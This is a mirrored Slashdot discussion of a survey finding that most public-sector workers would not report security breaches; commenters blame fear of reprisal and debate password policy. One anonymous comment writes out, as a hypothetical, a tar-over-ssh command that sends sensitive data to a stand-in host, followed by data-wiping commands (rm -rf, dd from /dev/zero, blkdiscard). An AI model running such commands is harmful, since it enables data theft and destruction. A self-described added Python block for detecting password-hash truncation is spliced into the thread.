Slashdot Mirror


Survey: 2/3 of Public Sector Workers Wouldn't Report a Security Breach

An anonymous reader sends news of a survey of workers in the public sector conducted by Daisy Group, a British IT firm, which found that 64% of them would stay quiet about a security breach they noticed. The survey also found that 5% of workers admitted to disabling the password protection features on their work devices, and 20% said they don't update their passwords regularly. Daisy Group's Graham Harris said, "When it comes to data security, all too often organisations focus purely on IT processes and forget about the staff that will be using them. Human error is one of, if not the most likely source for data security issues, and fear of reprisal is a powerful force." 16% of respondents said they didn't know if data protection was an important part of their company's security practices.

21 of 150 comments

  1. all of that can be fixed by ganjadude · Score: 4, Funny

    if only we give the government more money

    --
    have you seen my sig? there are many others like it but none that are the same
    1. Re:all of that can be fixed by Anonymous Coward · Score: 2

      if only we give the government more money

      Yes, but only if the money is spent on private contractors with a profit motive. An extra middle man with a profit motive, on top of any actual requirements, always makes things better, even Mid East wars.

  2. Humans by koan · Score: 2

    The weakest link.

    --
    "If any question why we died, Tell them because our fathers lied."
    1. Re: Humans by BVis · Score: 2

      I suspect the 2/3rds figure is coming from the fact that the person creating the gap in security is above a given person on the org chart. Pissing off your superiors is a great example of a Career Limiting Event. Rank has its privileges. I have not yet seen an organization of any appreciable size, public or private, where those at the top do not consider themselves above security policy. That's for the plebs, kind of like how taxes are for little people. While your typical rank and file worker may have to change his/her password every 90 days with one of a given complexity that has not been used before, the CEO says he wants to use a simple password (no joke, I've seen them use the name of the company all lower case) that does not expire. That's a clear breach of written security policy. But, who's going to call him on it? Nobody, if they want to keep their jobs.

      Ironically, the employees for whom following security policy is most important (not only due to company policy, but frequently due to external regulations like SOX, HIPAA, PCI, etc.) are the ones who are most likely to be able to bully IT staff into making exceptions.

      --
      Never underestimate the power of stupid people in large groups.
  3. comment subject here by Falos · Score: 5, Insightful

    Do we give out points on evaluations for "fully complies with security policy every time"? No, we slam plebs with metrics and quotas, after a childhood revolving around GPAs and diploma checkboxes and life-story-in-one-page application rodeos. We've trained society to game the system and if they're giving fucks in a certain, limited fashion, it's because the world only gives fucks in a certain, limited fashion.

    Of-fucking-course they game the system. "Fear of reprisal" isn't even a core symptom.

  4. Password updating by ngc5194 · Score: 5, Insightful

    Okay, the bit about how many folks wouldn't report a security breach is disturbing, but what's the fixation with updating passwords? I've been working in computer security for decades, and I almost never update passwords unless I'm required to or there is an incident. I'd much rather have my users pick strong passwords and not change them often than pick weak passwords because I insist they change them often. Sure, it's not just an either/or, but on the list of my concerns about system security, how frequently users update their passwords ranks WAAAAY down on the list.

    1. Re:Password updating by ganjadude · Score: 2

      I'm with you there. And I've even read some research that making people change passwords often in fact makes things worse, as people tend to forget and write down passwords that change more often.

      --
      have you seen my sig? there are many others like it but none that are the same
    2. Re:Password updating by Z00L00K · Score: 2

      I agree to some extent - frequent changes hurt more than they help. Changing a password shall be done when it's considered necessary, and it's only you that uses the password who can decide that.

      But to increase security, 2-factor authentication shall be used, so that you need to combine it with a keycard or similar in order to gain access. That will make it harder for anyone that wants to gain access to the net.

      But if you want higher security you should also build your net within a company on segments so that there are several separate segments of the network within the company. E.g. Human Resources should run their segment, Management another etc. That way a security compromise would not be as serious as if it was on a non-segmented network. This will of course require separate servers for the different segments and internal firewalls.

      --
      If builders built buildings the way programmers wrote programs, then the first woodpecker would destroy civilization.
    3. Re:Password updating by Anonymous Coward · Score: 3, Interesting

      Posting AC on this just because this is a common topic:

      Updating passwords is a quick band-aid, mainly to show that after a breach, -something- is done. So, the first thing done is that the Windows admin runs:

      dsquery user | dsmod user -mustchpwd yes

      and the place says they have "taken proper security precautions".

      As for reporting security breaches, here in the US, one is bred from birth (if they are born in the 1990s or later) to "sit down, shut up, and stop snitchin'". A good example of what happens if one reports security holes is what happened to my GF's son, who was in high school at the time. He had a classmate who found a security issue with the school's website and reported it. Well, he got arrested on the spot at the principal's office for a CFAA violation and expelled. Not for -using- the breach, but just -mentioning- it. The CFAA charge didn't stick (since he didn't use the exploit), but the expulsion did [1].

      This carries to the work world. I worked at one job where we were told to challenge people who were tailgating. One day, I was going in the building, had someone following me close behind. I refused to open the door and called security because the guy didn't have a badge, and refused to show ID. Well, he turned out to be some muckety muck with a high office, and I ended up getting handed my walking papers that day because "I didn't play well with senior company officials", even though policy was to disallow tailgating.

      So, it is no wonder why people are not going to go out of their way to report security related items. If one is in school, they get threatened with expulsion and arrest. In the work world, it is blacklisting, arrest, and loss of a job.

      The lack of resources put into security and the prompt punishing of people who "see something, say something" is part of why China is assraping us so hard when it comes to security. If someone mentions -anything- out of the ordinary, they get the Richard Jewell treatment, so in the school and work environment, it is just keep the head down and shut up.

      What can you do? I'm lucky to work at a place where they are responsive to security, but in most places, one might have to resort to anonymous tips to the FBI and other LEOs about the breach in order for anything to get done.

      I wonder what will happen long term when security breaches don't just constitute a "tar /home/SensitiveDataStash/*|ssh foo.com "cat - > foo.tar"', but following the offsite copy, a "rm -rf /home", followed by a "dd if=/dev/zero of=/dev/sda" if the drive is an array, HDD, or LUN or a "blkdiscard /dev/hda" if a SSD. Right now, companies don't give a rat's ass if they get broken into and data snarfed... but once the bad guys start destroying data, people will care. However, with the fact that any employees who might mention a security issue would get shitcanned, it is going to take a big company going out of business for security policies to actually be enacted that make sense. It may even take major loss of life.

      [1]: Irony is that the kid got his GED and his high school equivalency, and is doing far better than he would had he graduated HS.

    4. Re:Password updating by Rockoon · Score: 3, Funny

      Your password must be at least 6 characters and contain at least one of each of the following: The letter "q", the letter "w", the letter "e", the letter "r", the letter "t", and the letter "y".

      --
      "His name was James Damore."
  5. You're God damn right I wouldn't by Anonymous Coward · Score: 5, Insightful

    What benefit would there be in reporting a security breach? Workers, especially in the public sector, are increasingly being treated as the enemy when they report this sort of thing. Governments have created an environment where any sort of whistle-blowing is viewed as a hostile action, and employees are often rewarded with termination, lawsuits, or jail time. Until that climate changes for the better, I'm just going to do my job and keep my fucking mouth shut.

  6. So... by fuzzyfuzzyfungus · Score: 4, Insightful

    What percentage of them would expect to receive zero praise and potential reprisal if they did report a security problem?

    Yeah, sure, it's depressing that people aren't courageous moral heroes, or motivated to go above and beyond, most of the time, especially about boring stuff or things likely to get them in trouble.

    Guess what? That's one of the areas where management is supposed to be earning its money. One of the differences between an effective organization and a trainwreck is how good the flow of information is: are important observations from the periphery being collated and passed on so that HQ can actually achieve a coherent larger picture of the world? Are directions and information passed back down usefully informed by that picture? Or do you have unrealistic demands and buzzword nonsense flowing down; and soothing lies flowing up?

    This doesn't mean that 100% of employees are innocent ('insider threats' are a subset of 'people who wouldn't report a security breach', since they create them; but not a terribly large subset); but if you have this problem on a large scale, that's because your organization is dysfunctional.

  7. Maybe because security people are dicks? by gestalt_n_pepper · Score: 4, Insightful

    At my nameless three letter organization, here's how security works.

    "Oh, you didn't name your database server according to our specifications required by our lame monitoring tool that can't handle nonstandard system names? Rename your server. Oh, and if it breaks the database, that's your problem."

    "We just patched all the servers for greater security. Too bad you can't use your software to control or monitor them anymore, but that's your problem."

    "Due to a breach, everyone must change their password. Too bad it happened while you were off for a few days and needed to log in for an emergency, but that's your problem."

    Security's motto: We break stuff, put ALL the burden on the users, walk away AND we get paid for it!

    I don't know any other job where you can receive money for making stuff *not* work.

    --
    Please do not read this sig. Thank you.
    1. Re:Maybe because security people are dicks? by Anonymous Coward · Score: 5, Insightful

      Actually, security's motto is "If you can do your job, we're not doing ours."

  8. Re:Reprisal.. by Austerity+Empowers · Score: 4, Interesting

    Being fired is extreme, but in at least two companies I worked for, there was a strong "you broke it, you bought it" mentality to this sort of thing. If you found a security issue, you were expected to move across the corporation until it got fixed. Derailing your actual job, your personal life, and just about any hope of happiness until it got fixed. Of course you don't report it.

    The issue frequently is that IT is seen as the cost center to reduce most, so getting someone in IT to a) acknowledge it is an issue not user error/invalid use case requires champion effort, b) the IT guys that exist are marginally competent, the good ones are too expensive to work here full time, c) frequently users are told how dumb they are, so they aren't even sure if they've found an issue or "I must be doing something wrong", d) how did you find it in the first place? Were you doing something you shouldn't? HMMM?

  9. Lies, damn lies and statistics. by jklovanc · Score: 4, Insightful

    What were the actual questions? Was it worded to elicit no's? Did the respondents understand the question?
    What was the definition of "major security breach"? Was the threshold so low that things like not changing a password every 30 days is a major security breach? Who responded to the survey? Were they people who only see low level issues?

    Surveys can be tailored to get any desired response.

  10. Re:suspect it's much worse in the private sector by Anonymous Coward · Score: 2, Insightful

    Given that public jobs are relatively secure, you can assume this issue is much worse in the private sector.

    I wouldn't bet on that. Private sector involves losses and someone would be held to account. It really depends on the size and setup of the org.

    If you see a problem and point it out, you will be held to account unless you do everything you can to fix it. In a large organization, odds are you won't have the power to fix it, and you will get blamed for failing to fix it. If you don't tell anyone you see a problem, you can deny you knew there was a risk of a problem. Rational actors become less willing to report problems when people are "held to account", because *they* won't be held to account unless they admit they know of an issue.

    My last two employers had amazingly terrible security for exactly this reason. Everyone knew that anyone who pointed out a problem would be the scapegoat if anything went wrong. I now work in a private company which has a policy of "blameless post-mortems" for exactly this reason. By making an explicit rule that people will not be punished if they explain what went wrong and make a good faith effort to fix it, you actually get things fixed instead of "holding people to account".

  11. Re:Game the System by polyphemus · Score: 2

    Legit. Especially given the culture of "it's only wrong if you get caught" attitude towards breaking rules that pervades so many of our high schools and trickles up into college and the work force with every graduation, and then gets reinforced with every performance evaluation or annual bonus.

  12. Private sector's no better, probably worse by __roo · Score: 4, Insightful

    People will trade their passwords for a candy bar.

    Plus, public sector workers at least have some job security. I've worked in the private sector for 20+ years; there's a reason it's called "at-will" employment. Sticking your neck out to report a breach won't win you any friends, doesn't gain you anything, and if it gets someone who's politically savvy in trouble it could blow back on you. Safer and easier to keep quiet and keep your job.

    I wish it weren't like that—and to be fair, the best teams I've worked with weren't (and aren't!) like that. But way too many offices run that way, and politics and sleaziness beats honesty and ethics nine times out of ten.

  13. agreed. 18 years in infosec here by raymorris · Score: 2

    I've been doing infosec for 18 years and fully agree. Forcing people to change passwords simply forces them to increment a number at the end or write them down. It also forces you to allow more failures in your brute force detection.

    With pass phrases, it's mostly about using LONG ones. Yeah, pass phrases, not passwords. Then make damn sure you're not using DES hashes or something else that truncates passwords anywhere.
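The truncation warning above is easy to check for in practice. The following is an added example, not code from the thread or from any commenter: a probe that tells you whether a password-hashing backend silently ignores characters beyond some position, which is exactly what would make a long-passphrase policy meaningless. The `legacy_truncating_hash` function is a constructed stand-in that mimics the 8-character limit of traditional DES-based crypt(3); it is not a real DES implementation. `pbkdf2_hash` uses the standard-library PBKDF2 with a deliberately low iteration count so the probe runs quickly.

```python
"""
Added example (not from the Slashdot thread or any commenter): probe a
password-hashing backend for silent input truncation, the failure mode
raymorris warns about with DES-based crypt(3) hashes.
"""
import hashlib
import hmac
from typing import Callable, Optional

# A hasher takes (passphrase, salt) and returns a digest.
Hasher = Callable[[str, bytes], bytes]


def legacy_truncating_hash(passphrase: str, salt: bytes) -> bytes:
    # Constructed model of a scheme that ignores everything past 8
    # characters, the way traditional DES crypt does. NOT real DES crypt;
    # SHA-256 is used only so the model is self-contained.
    return hashlib.sha256(salt + passphrase[:8].encode("utf-8")).digest()


def pbkdf2_hash(passphrase: str, salt: bytes) -> bytes:
    # Modern scheme: every byte of the passphrase influences the output.
    # 10_000 iterations is low for production; it keeps the probe fast.
    return hashlib.pbkdf2_hmac("sha256", passphrase.encode("utf-8"), salt, 10_000)


def effective_length_limit(hasher: Hasher, max_len: int = 32) -> Optional[int]:
    """Return the smallest N such that the hasher ignores characters at
    index N and beyond, or None if no truncation is found below max_len.

    Method: hash two passphrases that are identical except at one position
    n; if the digests collide, position n is being ignored.
    """
    salt = b"fixed-salt-for-probe"  # constant so only the passphrase varies
    base = "a" * max_len
    for n in range(1, max_len):
        p1 = base[:n] + "x" + base[n + 1:]
        p2 = base[:n] + "y" + base[n + 1:]
        if hmac.compare_digest(hasher(p1, salt), hasher(p2, salt)):
            return n
    return None


def backend_supports_policy(hasher: Hasher, min_passphrase_len: int) -> bool:
    """True if a minimum-length policy of min_passphrase_len is meaningful
    with this hasher, i.e. the hasher does not truncate below that length."""
    limit = effective_length_limit(hasher, max_len=max(32, min_passphrase_len + 1))
    return limit is None or limit >= min_passphrase_len


if __name__ == "__main__":
    for name, h in (("legacy (8-char model)", legacy_truncating_hash),
                    ("pbkdf2-sha256", pbkdf2_hash)):
        print(f"{name}: truncates at {effective_length_limit(h)}, "
              f"16-char policy enforceable: {backend_supports_policy(h, 16)}")
```

Run the probe against whatever hashing function your authentication layer actually calls (wrapped to the `(passphrase, salt) -> bytes` shape); a result other than `None` means your minimum-length rule is being enforced on input the backend never sees.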

  14. when reporting one takes filling out a TPS report by Joe_Dragon · Score: 4, Insightful

    When reporting one takes filling out a TPS report and talking to 8 different higher-ups, many of them non-tech people, who wants to do it?